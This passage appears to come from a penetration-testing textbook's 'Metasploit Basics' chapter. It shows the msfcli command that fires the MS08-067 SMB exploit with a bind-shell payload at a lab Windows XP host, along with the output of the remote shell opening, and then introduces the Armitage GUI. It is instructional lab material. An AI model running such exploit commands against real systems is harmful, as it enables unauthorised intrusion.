Metasploit Basics
11
Compatible payloads
===================
Name
Description
----
-----------
generic/debug_trap
Generate a debug trap in the target process
generic/shell_bind_tcp
Listen for a connection and spawn a command shell
Having set all the required options for our exploit and selecting a pay-
load, we can run our exploit by passing the letter
E
to the end of the
msfcli
argument string, as shown here:
root@bt:/#
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.155 PAYLOAD=windows/shell/bind_tcp E
[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.101:46025 -> 192.168.1.155:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
We’re successful, because we have received a Windows command
prompt from the remote system.
Armitage
The
armitage
component of Metasploit is a fully interactive graphical user
interface created by Raphael Mudge. This interface is highly impressive,
feature rich, and available for free. We won’t be covering
armitage
in depth,
but it is definitely worth mentioning as something to explore. Our goal is
to teach the ins and outs of Metasploit, and the GUI is awesome once you
understand how the Framework actually operates.
Running Armitage
To launch
armitage
, run the command
armitage
. During startup, select
Start
MSF
, which will allow
armitage
to connect to your Metasploit instance.
root@bt:/opt/framework3/msf3#
armitage
After
armitage
is running, simply click a menu to perform a particular
attack or access other Metasploit functionality. For example, Figure 2-1 shows
the browser (client-side) exploits.